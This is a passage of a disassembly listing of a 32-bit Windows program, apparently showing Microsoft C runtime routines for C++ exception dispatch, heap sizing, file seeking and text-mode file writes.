mov esi, eax
loc_422845: ; CODE XREF: sub_4227F8+A2�j
mov eax, [ebp+var_4]
cmp eax, [ebp+var_8]
jnb short loc_42289C
cmp edi, [esi]
jl short loc_422894
cmp edi, [esi+4]
jg short loc_422894
mov eax, [esi+0Ch]
mov ecx, [esi+10h]
shl eax, 4
add eax, ecx
mov ecx, [eax-0Ch]
test ecx, ecx
jz short loc_42286E
cmp byte ptr [ecx+8], 0
jnz short loc_422894
loc_42286E: ; CODE XREF: sub_4227F8+6E�j
push 1
add eax, 0FFFFFFF0h
push [ebp+arg_1C]
push [ebp+arg_18]
push esi
push 0
push eax
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4229B1
add esp, 2Ch
loc_422894: ; CODE XREF: sub_4227F8+57�j
; sub_4227F8+5C�j ...
inc [ebp+var_4]
add esi, 14h
jmp short loc_422845
; ---------------------------------------------------------------------------
loc_42289C: ; CODE XREF: sub_4227F8+2F�j
; sub_4227F8+53�j
pop edi
pop esi
leave
retn
sub_4227F8 endp
; =============== S U B R O U T I N E =======================================
sub_4228A0 proc near ; CODE XREF: sub_422651+10F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
push edi
mov edi, [esp+8+arg_0]
mov eax, [edi+4]
test eax, eax
jz short loc_4228F7
cmp byte ptr [eax+8], 0
lea edx, [eax+8]
jz short loc_4228F7
mov esi, [esp+8+arg_4]
mov ecx, [esi+4]
cmp eax, ecx
jz short loc_4228D1
add ecx, 8
push ecx
push edx
call sub_41CA50
pop ecx
test eax, eax
pop ecx
jnz short loc_4228F3
loc_4228D1: ; CODE XREF: sub_4228A0+1F�j
test byte ptr [esi], 2
jz short loc_4228DB
test byte ptr [edi], 8
jz short loc_4228F3
loc_4228DB: ; CODE XREF: sub_4228A0+34�j
mov eax, [esp+8+arg_8]
mov eax, [eax]
test al, 1
jz short loc_4228EA
test byte ptr [edi], 1
jz short loc_4228F3
loc_4228EA: ; CODE XREF: sub_4228A0+43�j
test al, 2
jz short loc_4228F7
test byte ptr [edi], 2
jnz short loc_4228F7
loc_4228F3: ; CODE XREF: sub_4228A0+2F�j
; sub_4228A0+39�j ...
xor eax, eax
jmp short loc_4228FA
; ---------------------------------------------------------------------------
loc_4228F7: ; CODE XREF: sub_4228A0+B�j
; sub_4228A0+14�j ...
push 1
pop eax
loc_4228FA: ; CODE XREF: sub_4228A0+55�j
pop edi
pop esi
retn
sub_4228A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4228FD proc near ; CODE XREF: sub_4225B6+34�p
; sub_4229B1+42�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4278A8
push offset sub_423CC0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov ebx, [ebp+arg_0]
mov esi, [ebx+8]
mov [ebp+var_1C], esi
mov edi, [ebp+arg_8]
loc_42292F: ; CODE XREF: sub_4228FD+8A�j
cmp esi, [ebp+arg_C]
jz short loc_422989
cmp esi, 0FFFFFFFFh
jle short loc_42293E
cmp esi, [edi+4]
jl short loc_422943
loc_42293E: ; CODE XREF: sub_4228FD+3A�j
call sub_422E52
loc_422943: ; CODE XREF: sub_4228FD+3F�j
and [ebp+var_4], 0
mov eax, [edi+8]
mov eax, [eax+esi*8+4]
test eax, eax
jz short loc_42295E
push 103h
push ebx
push eax
call sub_422DB0
loc_42295E: ; CODE XREF: sub_4228FD+53�j
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_42297E
; ---------------------------------------------------------------------------
push [ebp+var_14]
call sub_42299B
pop ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
or [ebp+var_4], 0FFFFFFFFh
mov edi, [ebp+arg_8]
mov ebx, [ebp+arg_0]
mov esi, [ebp+var_1C]
loc_42297E: ; CODE XREF: sub_4228FD+65�j
mov eax, [edi+8]
mov esi, [eax+esi*8]
mov [ebp+var_1C], esi
jmp short loc_42292F
; ---------------------------------------------------------------------------
loc_422989: ; CODE XREF: sub_4228FD+35�j
mov [ebx+8], esi
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_4228FD endp
; =============== S U B R O U T I N E =======================================
sub_42299B proc near ; CODE XREF: sub_4228FD+6A�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov eax, [eax]
cmp dword ptr [eax], 0E06D7363h
jz short loc_4229AC
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4229AC: ; CODE XREF: sub_42299B+C�j
jmp sub_422DFC
sub_42299B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4229B1 proc near ; CODE XREF: sub_422651+151�p
; sub_4227F8+94�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
arg_24 = dword ptr 2Ch
push ebp
mov ebp, esp
cmp [ebp+arg_18], 0
push ebx
mov ebx, [ebp+arg_14]
push esi
push edi
mov edi, [ebp+arg_4]
jz short loc_4229D3
push [ebp+arg_18]
push ebx
push edi
push [ebp+arg_0]
call sub_422B62
add esp, 10h
loc_4229D3: ; CODE XREF: sub_4229B1+10�j
cmp [ebp+arg_24], 0
push [ebp+arg_0]
jnz short loc_4229DF
push edi
jmp short loc_4229E2
; ---------------------------------------------------------------------------
loc_4229DF: ; CODE XREF: sub_4229B1+29�j
push [ebp+arg_24]
loc_4229E2: ; CODE XREF: sub_4229B1+2C�j
call sub_41D2AC
mov esi, [ebp+arg_1C]
push dword ptr [esi]
push [ebp+arg_10]
push [ebp+arg_C]
push edi
call sub_4228FD
mov eax, [esi+4]
push 100h
push [ebp+arg_20]
inc eax
mov [edi+8], eax
push dword ptr [ebx+0Ch]
push [ebp+arg_10]
push [ebp+arg_8]
push edi
push [ebp+arg_0]
call sub_422A2C
add esp, 2Ch
test eax, eax
jz short loc_422A27
push edi
push eax
call sub_41D26A
loc_422A27: ; CODE XREF: sub_4229B1+6D�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_4229B1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422A2C proc near ; CODE XREF: sub_4229B1+63�p
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4278B8
push offset sub_423CC0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, [ebp+arg_10]
mov [ebp+var_2C], eax
xor ebx, ebx
mov [ebp+var_24], ebx
mov esi, [ebp+arg_4]
mov ecx, [esi-4]
mov [ebp+var_28], ecx
mov ecx, dword_4DBE68
mov [ebp+var_1C], ecx
mov ecx, dword_4DBE6C
mov [ebp+var_20], ecx
mov edi, [ebp+arg_0]
mov dword_4DBE68, edi
mov ecx, [ebp+arg_8]
mov dword_4DBE6C, ecx
mov [ebp+var_4], ebx
mov [ebp+var_4], 1
push [ebp+arg_18]
push [ebp+arg_14]
push eax
push [ebp+arg_C]
push esi
call sub_41D331
add esp, 14h
mov [ebp+var_2C], eax
mov [ebp+var_4], ebx
or [ebp+var_4], 0FFFFFFFFh
call sub_422AF2
mov eax, [ebp+var_2C]
loc_422AB9: ; CODE XREF: sub_422AD2+16�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_422A2C endp
; =============== S U B R O U T I N E =======================================
sub_422AC8 proc near ; DATA XREF: .rdata:004278C8�o
push dword ptr [ebp-14h]
call sub_422B38
pop ecx
retn
sub_422AC8 endp
; =============== S U B R O U T I N E =======================================
sub_422AD2 proc near ; DATA XREF: .rdata:004278CC�o
mov esp, [ebp-18h]
and dword ptr [ebp-2Ch], 0
push 0FFFFFFFFh
lea eax, [ebp-10h]
push eax
call sub_41D592
pop ecx
pop ecx
xor eax, eax
jmp short loc_422AB9
sub_422AD2 endp
; =============== S U B R O U T I N E =======================================
sub_422AEA proc near ; DATA XREF: .rdata:004278C0�o
xor ebx, ebx
mov esi, [ebp+0Ch]
mov edi, [ebp+8]
sub_422AEA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_422AF2 proc near ; CODE XREF: sub_422A2C+85�p
mov eax, [ebp-28h]
mov [esi-4], eax
mov eax, [ebp-1Ch]
mov dword_4DBE68, eax
mov eax, [ebp-20h]
mov dword_4DBE6C, eax
cmp dword ptr [edi], 0E06D7363h
jnz short locret_422B37
cmp dword ptr [edi+10h], 3
jnz short locret_422B37
cmp dword ptr [edi+14h], 19930520h
jnz short locret_422B37
cmp [ebp-24h], ebx
jnz short locret_422B37
cmp [ebp-2Ch], ebx
jz short locret_422B37
call sub_41D5FA
push eax
push edi
call sub_422D26
pop ecx
pop ecx
locret_422B37: ; CODE XREF: sub_422AF2+1C�j
; sub_422AF2+22�j ...
retn
sub_422AF2 endp
; =============== S U B R O U T I N E =======================================
sub_422B38 proc near ; CODE XREF: sub_422AC8+3�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov eax, [eax]
cmp dword ptr [eax], 0E06D7363h
jnz short loc_422B5F
cmp dword ptr [eax+10h], 3
jnz short loc_422B5F
cmp dword ptr [eax+14h], 19930520h
jnz short loc_422B5F
cmp dword ptr [eax+1Ch], 0
jnz short loc_422B5F
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_422B5F: ; CODE XREF: sub_422B38+C�j
; sub_422B38+12�j ...
xor eax, eax
retn
sub_422B38 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422B62 proc near ; CODE XREF: sub_4229B1+1A�p
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4278D0
push offset sub_423CC0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov ecx, [ebp+arg_8]
mov eax, [ecx+4]
test eax, eax
jz loc_422D0B
cmp byte ptr [eax+8], 0
jz loc_422D0B
mov eax, [ecx+8]
test eax, eax
jz loc_422D0B
mov edx, [ebp+arg_4]
lea edi, [eax+edx+0Ch]
and [ebp+var_4], 0
test byte ptr [ecx], 8
jz short loc_422BFF
mov esi, [ebp+arg_0]
push 1
push dword ptr [esi+18h]
call sub_424F80
pop ecx
pop ecx
test eax, eax
jz loc_422D02
push 1
push edi
call sub_424F9C
pop ecx
pop ecx
test eax, eax
jz loc_422D02
mov eax, [esi+18h]
mov [edi], eax
mov ecx, [ebp+arg_C]
add ecx, 8
push ecx
loc_422BF0: ; CODE XREF: sub_422B62+F5�j
push eax
call sub_422D8D
pop ecx
pop ecx
mov [edi], eax
jmp loc_422D07
; ---------------------------------------------------------------------------
loc_422BFF: ; CODE XREF: sub_422B62+57�j
mov esi, [ebp+arg_C]
test byte ptr [esi], 1
jz short loc_422C59
mov ebx, [ebp+arg_0]
push 1
push dword ptr [ebx+18h]
call sub_424F80
pop ecx
pop ecx
test eax, eax
jz loc_422D02
push 1
push edi
call sub_424F9C
pop ecx
pop ecx
test eax, eax
jz loc_422D02
push dword ptr [esi+14h]
push dword ptr [ebx+18h]
push edi
call sub_41D670
add esp, 0Ch
cmp dword ptr [esi+14h], 4
jnz loc_422D07
mov eax, [edi]
test eax, eax
jz loc_422D07
add esi, 8
push esi
jmp short loc_422BF0
; ---------------------------------------------------------------------------
loc_422C59: ; CODE XREF: sub_422B62+A3�j
cmp dword ptr [esi+18h], 0
mov ebx, [ebp+arg_0]
push 1
push dword ptr [ebx+18h]
jnz short loc_422CA1
call sub_424F80
pop ecx
pop ecx
test eax, eax
jz loc_422D02
push 1
push edi
call sub_424F9C
pop ecx
pop ecx
test eax, eax
jz short loc_422D02
push dword ptr [esi+14h]
add esi, 8
push esi
push dword ptr [ebx+18h]
call sub_422D8D
pop ecx
pop ecx
push eax
push edi
call sub_41D670
add esp, 0Ch
jmp short loc_422D07
; ---------------------------------------------------------------------------
loc_422CA1: ; CODE XREF: sub_422B62+103�j
call sub_424F80
pop ecx
pop ecx
test eax, eax
jz short loc_422D02
push 1
push edi
call sub_424F9C
pop ecx
pop ecx
test eax, eax
jz short loc_422D02
push dword ptr [esi+18h]
call sub_424FB8
pop ecx
test eax, eax
jz short loc_422D02
test byte ptr [esi], 4
jz short loc_422CE8
push 1
lea eax, [esi+8]
push eax
push dword ptr [ebx+18h]
call sub_422D8D
pop ecx
pop ecx
push eax
push dword ptr [esi+18h]
push edi
call sub_41D2A5
jmp short loc_422D07
; ---------------------------------------------------------------------------
loc_422CE8: ; CODE XREF: sub_422B62+168�j
lea eax, [esi+8]
push eax
push dword ptr [ebx+18h]
call sub_422D8D
pop ecx
pop ecx
push eax
push dword ptr [esi+18h]
push edi
call sub_41D29E
jmp short loc_422D07
; ---------------------------------------------------------------------------
loc_422D02: ; CODE XREF: sub_422B62+6A�j
; sub_422B62+7C�j ...
call sub_422E52
loc_422D07: ; CODE XREF: sub_422B62+98�j
; sub_422B62+E1�j ...
or [ebp+var_4], 0FFFFFFFFh
loc_422D0B: ; CODE XREF: sub_422B62+2E�j
; sub_422B62+38�j ...
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_422B62 endp
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
jmp sub_422DFC
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422D26 proc near ; CODE XREF: sub_422651+170�p
; sub_422AF2+3E�p
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4278E0
push offset sub_423CC0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, [ebp+arg_0]
test eax, eax
jz short loc_422D6D
mov ecx, [eax+1Ch]
mov ecx, [ecx+4]
test ecx, ecx
jz short loc_422D6D
and [ebp+var_4], 0
push ecx
push dword ptr [eax+18h]
call sub_41D29E
or [ebp+var_4], 0FFFFFFFFh
loc_422D6D: ; CODE XREF: sub_422D26+2A�j
; sub_422D26+34�j
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_422D26 endp
; ---------------------------------------------------------------------------
xor eax, eax
cmp [ebp+0Ch], al
setnz al
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
jmp sub_422DFC
; =============== S U B R O U T I N E =======================================
sub_422D8D proc near ; CODE XREF: sub_422B62+8F�p
; sub_422B62+12C�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
push esi
mov esi, [esp+4+arg_0]
mov eax, [ecx]
mov edx, [ecx+4]
add eax, esi
test edx, edx
jl short loc_422DAE
mov esi, [edx+esi]
mov ecx, [ecx+8]
mov ecx, [esi+ecx]
add ecx, edx
add eax, ecx
loc_422DAE: ; CODE XREF: sub_422D8D+12�j
pop esi
retn
sub_422D8D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422DB0 proc near ; CODE XREF: sub_41D331+40�p
; sub_4228FD+5C�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 4
push ebx
push ecx
mov eax, [ebp+arg_4]
add eax, 0Ch
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
push ebp
push [ebp+arg_8]
mov ecx, [ebp+arg_8]
mov ebp, [ebp+var_4]
call sub_41D61D
push esi
push edi
call eax
pop edi
pop esi
mov ebx, ebp
pop ebp
mov ecx, [ebp+arg_8]
push ebp
mov ebp, ebx
cmp ecx, 100h
jnz short loc_422DEF
mov ecx, 2
loc_422DEF: ; CODE XREF: sub_422DB0+38�j
push ecx
call sub_41D61D
pop ebp
pop ecx
pop ebx
leave
retn 0Ch
sub_422DB0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422DFC proc near ; CODE XREF: sub_422651:loc_4227F3�j
; sub_42299B:loc_4229AC�j ...
var_18 = dword ptr -18h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00424FD0 SIZE 00000017 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4278F0
push offset sub_423CC0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
push ebx
push esi
push edi
mov [ebp+var_18], esp
and [ebp+var_4], 0
mov eax, dword_4DBE74
test eax, eax
jz short loc_422E44
mov [ebp+var_4], 1
call eax
jmp short loc_422E40
; ---------------------------------------------------------------------------
loc_422E39: ; DATA XREF: .rdata:00427900�o
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_422E3D: ; DATA XREF: .rdata:00427904�o
mov esp, [ebp+var_18]
loc_422E40: ; CODE XREF: sub_422DFC+3B�j
and [ebp+var_4], 0
loc_422E44: ; CODE XREF: sub_422DFC+30�j
or [ebp+var_4], 0FFFFFFFFh
call $+5
loc_422E4D: ; DATA XREF: .rdata:004278F8�o
jmp loc_424FD0
sub_422DFC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422E52 proc near ; CODE XREF: sub_41D4D3+23�p
; sub_41D4D3:loc_41D53E�p ...
var_18 = dword ptr -18h
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_427908
push offset sub_423CC0
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
push ebx
push esi
push edi
mov [ebp+var_18], esp
and [ebp+var_4], 0
mov eax, off_43D444
test eax, eax
jz short loc_422E9A
mov [ebp+var_4], 1
call eax ; sub_422DFC
jmp short loc_422E96
; ---------------------------------------------------------------------------
loc_422E8F: ; DATA XREF: .rdata:00427918�o
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_422E93: ; DATA XREF: .rdata:0042791C�o
mov esp, [ebp+var_18]
loc_422E96: ; CODE XREF: sub_422E52+3B�j
and [ebp+var_4], 0
loc_422E9A: ; CODE XREF: sub_422E52+30�j
or [ebp+var_4], 0FFFFFFFFh
call $+5
loc_422EA3: ; DATA XREF: .rdata:00427910�o
jmp sub_422DFC
sub_422E52 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422EA8 proc near ; CODE XREF: sub_41D9B3+7�p
; sub_41D9B3+26�p
var_8 = byte ptr -8
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, dword_4DD388
push esi
cmp eax, 3
jnz short loc_422ED1
mov esi, [ebp+arg_0]
push esi
call sub_41E717
test eax, eax
pop ecx
jz short loc_422ECE
mov eax, [esi-4]
sub eax, 9
jmp short loc_422F06
; ---------------------------------------------------------------------------
loc_422ECE: ; CODE XREF: sub_422EA8+1C�j
push esi
jmp short loc_422EF8
; ---------------------------------------------------------------------------
loc_422ED1: ; CODE XREF: sub_422EA8+E�j
cmp eax, 2
jnz short loc_422EF5
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_8]
push eax
push [ebp+arg_0]
call sub_41F472
add esp, 0Ch
test eax, eax
jz short loc_422EF5
movzx eax, byte ptr [eax]
shl eax, 4
jmp short loc_422F06
; ---------------------------------------------------------------------------
loc_422EF5: ; CODE XREF: sub_422EA8+2C�j
; sub_422EA8+43�j
push [ebp+arg_0]
loc_422EF8: ; CODE XREF: sub_422EA8+27�j
push 0
push dword_4DD384
call ds:dword_42704C ; RtlSizeHeap
loc_422F06: ; CODE XREF: sub_422EA8+24�j
; sub_422EA8+4B�j
pop esi
leave
retn
sub_422EA8 endp
; =============== S U B R O U T I N E =======================================
sub_422F09 proc near ; CODE XREF: sub_41DA8B+67�p
; sub_41F9BC+1A2�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_0]
push ebx
cmp eax, dword_4DD140
push esi
push edi
jnb short loc_422F8B
mov ecx, eax
mov esi, eax
sar ecx, 5
and esi, 1Fh
lea edi, ds:4DD040h[ecx*4]
shl esi, 3
mov ecx, [edi]
test byte ptr [ecx+esi+4], 1
jz short loc_422F8B
push eax
call sub_4240AA
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_422F4D
mov dword_4DBDDC, 9
jmp short loc_422F9C
; ---------------------------------------------------------------------------
loc_422F4D: ; CODE XREF: sub_422F09+36�j
push [esp+0Ch+arg_8]
push 0
push [esp+14h+arg_4]
push eax
call ds:dword_427128 ; SetFilePointer
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jnz short loc_422F6D
call ds:dword_427094 ; RtlGetLastWin32Error
jmp short loc_422F6F
; ---------------------------------------------------------------------------
loc_422F6D: ; CODE XREF: sub_422F09+5A�j
xor eax, eax
loc_422F6F: ; CODE XREF: sub_422F09+62�j
test eax, eax
jz short loc_422F7C
push eax
call sub_420C7F
pop ecx
jmp short loc_422F9C
; ---------------------------------------------------------------------------
loc_422F7C: ; CODE XREF: sub_422F09+68�j
mov eax, [edi]
and byte ptr [eax+esi+4], 0FDh
lea eax, [eax+esi+4]
mov eax, ebx
jmp short loc_422F9F
; ---------------------------------------------------------------------------
loc_422F8B: ; CODE XREF: sub_422F09+D�j
; sub_422F09+2A�j
and dword_4DBDE0, 0
mov dword_4DBDDC, 9
loc_422F9C: ; CODE XREF: sub_422F09+42�j
; sub_422F09+71�j
or eax, 0FFFFFFFFh
loc_422F9F: ; CODE XREF: sub_422F09+80�j
pop edi
pop esi
pop ebx
retn
sub_422F09 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_422FA3 proc near ; CODE XREF: sub_41DA8B+2A�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
xor ebx, ebx
mov esi, [edi+10h]
cmp [edi+4], ebx
mov [ebp+var_C], esi
jge short loc_422FBF
mov [edi+4], ebx
loc_422FBF: ; CODE XREF: sub_422FA3+17�j
push 1
push ebx
push esi
call sub_422F09
add esp, 0Ch
cmp eax, ebx
mov [ebp+var_4], eax
jl short loc_42302D
mov edx, [edi+0Ch]
test dx, 108h
jnz short loc_422FE4
sub eax, [edi+4]
jmp loc_4230F6
; ---------------------------------------------------------------------------
loc_422FE4: ; CODE XREF: sub_422FA3+37�j
mov eax, [edi]
mov ecx, [edi+8]
mov ebx, eax
sub ebx, ecx
test dl, 3
mov [ebp+var_8], ebx
jz short loc_42301E
mov edx, esi
mov ebx, esi
sar edx, 5
and ebx, 1Fh
mov edx, dword_4DD040[edx*4]
test byte ptr [edx+ebx*8+4], 80h
jz short loc_423035
mov edx, ecx
loc_42300F: ; CODE XREF: sub_422FA3+79�j
cmp edx, eax
jnb short loc_423035
cmp byte ptr [edx], 0Ah
jnz short loc_42301B
inc [ebp+var_8]
loc_42301B: ; CODE XREF: sub_422FA3+73�j
inc edx
jmp short loc_42300F
; ---------------------------------------------------------------------------
loc_42301E: ; CODE XREF: sub_422FA3+50�j
test dl, 80h
jnz short loc_423035
mov dword_4DBDDC, 16h
loc_42302D: ; CODE XREF: sub_422FA3+2D�j
or eax, 0FFFFFFFFh
jmp loc_4230F6
; ---------------------------------------------------------------------------
loc_423035: ; CODE XREF: sub_422FA3+68�j
; sub_422FA3+6E�j ...
cmp [ebp+var_4], 0
jnz short loc_423043
mov eax, [ebp+var_8]
jmp loc_4230F6
; ---------------------------------------------------------------------------
loc_423043: ; CODE XREF: sub_422FA3+96�j
test byte ptr [edi+0Ch], 1
jz loc_4230EE
mov edx, [edi+4]
test edx, edx
jnz short loc_42305C
and [ebp+var_8], edx
jmp loc_4230EE
; ---------------------------------------------------------------------------
loc_42305C: ; CODE XREF: sub_422FA3+AF�j
sub eax, ecx
add eax, edx
mov [ebp+arg_0], eax
mov eax, esi
sar eax, 5
and esi, 1Fh
lea ebx, ds:4DD040h[eax*4]
shl esi, 3
mov eax, [ebx]
test byte ptr [esi+eax+4], 80h
jz short loc_4230E8
push 2
push 0
push [ebp+var_C]
call sub_422F09
add esp, 0Ch
cmp eax, [ebp+var_4]
jnz short loc_4230AF
mov eax, [edi+8]
mov ecx, [ebp+arg_0]
add ecx, eax
loc_42309A: ; CODE XREF: sub_422FA3+104�j
cmp eax, ecx
jnb short loc_4230A9
cmp byte ptr [eax], 0Ah
jnz short loc_4230A6
inc [ebp+arg_0]
loc_4230A6: ; CODE XREF: sub_422FA3+FE�j
inc eax
jmp short loc_42309A
; ---------------------------------------------------------------------------
loc_4230A9: ; CODE XREF: sub_422FA3+F9�j
test byte ptr [edi+0Dh], 20h
jmp short loc_4230E3
; ---------------------------------------------------------------------------
loc_4230AF: ; CODE XREF: sub_422FA3+ED�j
push 0
push [ebp+var_4]
push [ebp+var_C]
call sub_422F09
mov eax, 200h
add esp, 0Ch
cmp [ebp+arg_0], eax
ja short loc_4230D6
mov ecx, [edi+0Ch]
test cl, 8
jz short loc_4230D6
test ch, 4
jz short loc_4230D9
loc_4230D6: ; CODE XREF: sub_422FA3+124�j
; sub_422FA3+12C�j
mov eax, [edi+18h]
loc_4230D9: ; CODE XREF: sub_422FA3+131�j
mov [ebp+arg_0], eax
mov eax, [ebx]
test byte ptr [esi+eax+4], 4
loc_4230E3: ; CODE XREF: sub_422FA3+10A�j
jz short loc_4230E8
inc [ebp+arg_0]
loc_4230E8: ; CODE XREF: sub_422FA3+D9�j
; sub_422FA3:loc_4230E3�j
mov eax, [ebp+arg_0]
sub [ebp+var_4], eax
loc_4230EE: ; CODE XREF: sub_422FA3+A4�j
; sub_422FA3+B4�j
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
add eax, ecx
loc_4230F6: ; CODE XREF: sub_422FA3+3C�j
; sub_422FA3+8D�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_422FA3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4230FB proc near ; CODE XREF: sub_41DB54+A2�p
; sub_41E42B+2C�p ...
var_414 = byte ptr -414h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 414h
mov ecx, [ebp+arg_0]
push ebx
cmp ecx, dword_4DD140
push esi
push edi
jnb loc_42328F
mov eax, ecx
mov esi, ecx
sar eax, 5
and esi, 1Fh
lea ebx, ds:4DD040h[eax*4]
shl esi, 3
mov eax, [ebx]
mov al, [eax+esi+4]
test al, 1
jz loc_42328F
xor edi, edi
cmp [ebp+arg_8], edi
mov [ebp+var_8], edi
mov [ebp+var_10], edi
jnz short loc_42314C
loc_423145: ; CODE XREF: sub_4230FB+177�j
xor eax, eax
jmp loc_4232A3
; ---------------------------------------------------------------------------
loc_42314C: ; CODE XREF: sub_4230FB+48�j
test al, 20h
jz short loc_42315C
push 2
push edi
push ecx
call sub_422F09
add esp, 0Ch
loc_42315C: ; CODE XREF: sub_4230FB+53�j
mov eax, [ebx]
add eax, esi
test byte ptr [eax+4], 80h
jz loc_42322B
mov eax, [ebp+arg_4]
cmp [ebp+arg_8], edi
mov [ebp+var_4], eax
mov [ebp+arg_0], edi
jbe loc_423263
loc_42317C: ; CODE XREF: sub_4230FB+F5�j
lea eax, [ebp+var_414]
loc_423182: ; CODE XREF: sub_4230FB+B9�j
mov ecx, [ebp+var_4]
sub ecx, [ebp+arg_4]
cmp ecx, [ebp+arg_8]
jnb short loc_4231B6
mov ecx, [ebp+var_4]
inc [ebp+var_4]
mov cl, [ecx]
cmp cl, 0Ah
jnz short loc_4231A1
inc [ebp+var_10]
mov byte ptr [eax], 0Dh
inc eax
loc_4231A1: ; CODE XREF: sub_4230FB+9D�j
mov [eax], cl
inc eax
mov ecx, eax
lea edx, [ebp+var_414]
sub ecx, edx
cmp ecx, 400h
jl short loc_423182
loc_4231B6: ; CODE XREF: sub_4230FB+90�j
mov edi, eax
lea eax, [ebp+var_414]
sub edi, eax
lea eax, [ebp+var_C]
push 0
push eax
lea eax, [ebp+var_414]
push edi
push eax
mov eax, [ebx]
push dword ptr [eax+esi]
call ds:dword_4270F0 ; WriteFile
test eax, eax
jz short loc_423220
mov eax, [ebp+var_C]
add [ebp+var_8], eax
cmp eax, edi
jl short loc_4231F2
mov eax, [ebp+var_4]
sub eax, [ebp+arg_4]
